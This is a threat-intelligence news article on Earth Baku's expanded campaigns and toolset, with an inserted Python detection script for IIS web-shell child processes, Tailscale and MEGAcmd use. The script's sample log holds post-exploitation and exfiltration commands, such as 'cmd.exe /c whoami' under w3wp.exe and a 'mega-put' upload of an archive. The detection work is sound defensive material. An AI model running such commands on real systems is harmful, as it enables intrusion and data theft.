
Com TW NOw News 2024

China-backed Earth Baku expands cyberattacks to Europe, Middle East and Africa

August 14, 2024 | Ravie Lakshmanan | Threat Intelligence / Cyber Attack

The China-backed threat actor Earth Baku has expanded its targeting beyond the Indo-Pacific region to Europe, the Middle East and Africa, starting in late 2022.

New countries targeted as part of the activity include Italy, Germany, the UAE, and Qatar, with suspected attacks also detected in Georgia and Romania. Government, media and communications, telecom, technology, healthcare, and education are some of the sectors identified as part of the intrusion set.

“The group has updated its tools, tactics, and procedures (TTPs) in more recent campaigns, leveraging publicly available applications such as IIS servers as attack entry points and then deploying advanced malware toolsets into the victim’s environment,” Trend Micro researchers Ted Lee and Theo Chen said in an analysis published last week.

The findings build on recent reports from Zscaler and Google-owned Mandiant, which also detailed the threat actor's use of malware families including DodgeBox (also known as DUSTPAN) and MoonWalk (also known as DUSTTRAP), which Trend Micro tracks as StealthReacher and SneakCross, respectively.

Earth Baku, a threat actor associated with APT41, was observed using StealthVector in October 2020. Its attack chains exploit public-facing applications to drop the Godzilla web shell, which is then used to deliver follow-up payloads.

StealthReacher is assessed to be an improved version of the StealthVector backdoor loader and is responsible for launching SneakCross, a modular implant and likely successor to ScrambleCross that uses Google services for its command-and-control (C2) communications.

The attacks are also characterized by the use of other post-exploitation tools such as iox, Rakshasa, and a Virtual Private Network (VPN) service known as Tailscale. Exfiltration of sensitive data to the MEGA cloud storage service is performed using a command-line utility called MEGAcmd.
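The tradecraft described above (a web shell dropped on a public-facing IIS server, Tailscale for remote access and persistence, MEGAcmd for exfiltration to MEGA) translates into a few process-lineage and tooling checks a defender can run over endpoint telemetry. The following is an added example, not code from The Hacker News or Trend Micro: it parses constructed Sysmon-style process-creation lines and flags an IIS worker process spawning a shell, Tailscale execution, and MEGAcmd usage. The log format, file paths and the MEGAcmd binary and command names are assumptions for illustration.

```python
"""Detection sketch over constructed process-creation events.

Each line: <timestamp>|<parent image>|<image>|<command line>
The log format and the tool file names are assumptions, not vendor data.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    parent: str
    image: str
    cmdline: str


# Constructed sample telemetry (not real incident data). The auth key is a placeholder.
SAMPLE_LOG = """\
2024-08-01T10:00:01Z|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs
2024-08-01T10:02:13Z|C:\\Windows\\System32\\inetsrv\\w3wp.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami
2024-08-01T10:05:44Z|C:\\Windows\\explorer.exe|C:\\Program Files\\Tailscale\\tailscale.exe|tailscale.exe up --authkey tskey-PLACEHOLDER
2024-08-01T10:07:09Z|C:\\Windows\\System32\\cmd.exe|C:\\Tools\\MEGAcmd\\MEGAclient.exe|mega-put C:\\Users\\Public\\archive.7z /backup
2024-08-01T10:09:30Z|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
"""

# IIS worker process: a web shell runs inside it, so its children are the tell.
WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Assumed MEGAcmd binary names on Windows; adjust to what your EDR actually records.
MEGACMD_BINARIES = {"megaclient.exe", "megacmdserver.exe", "megacmdshell.exe"}
MEGACMD_VERBS = re.compile(r"\bmega-(put|login|export|sync)\b")


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse(line: str) -> ProcEvent:
    ts, parent, image, cmdline = line.split("|", 3)
    return ProcEvent(ts, parent, image, cmdline)


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits = []
    parent, image = basename(ev.parent), basename(ev.image)
    cmd = ev.cmdline.lower()
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("webshell-child-process")
    if image in MEGACMD_BINARIES or MEGACMD_VERBS.search(cmd):
        hits.append("megacmd-exfil-tooling")
    # Tailscale is legitimate software; treat this as a review item, not a verdict.
    if image == "tailscale.exe" or "tailscale" in cmd:
        hits.append("tailscale-remote-access")
    return hits


def detect(log_text: str) -> list[tuple[str, str]]:
    """Scan a log blob and return (timestamp, rule) pairs in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse(line)
        for rule in classify(ev):
            findings.append((ev.ts, rule))
    return findings


if __name__ == "__main__":
    for ts, rule in detect(SAMPLE_LOG):
        print(ts, rule)
```

The parent-child rule is the most durable of the three: whatever web shell is used, the IIS worker process has no business spawning an interactive shell. The tooling rules are noisier, since both Tailscale and MEGAcmd have legitimate users, so they are best paired with an allow-list of approved installs and an alert on first-seen execution per host.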

“The group has deployed new loaders such as StealthVector and StealthReacher to stealthily launch backdoor components, and SneakCross is their latest modular backdoor,” the researchers said.

“Earth Baku also used several tools during the post-exploitation, including a custom iox tool, Rakshasa, TailScale for persistence, and MEGAcmd for efficient data exfiltration.”
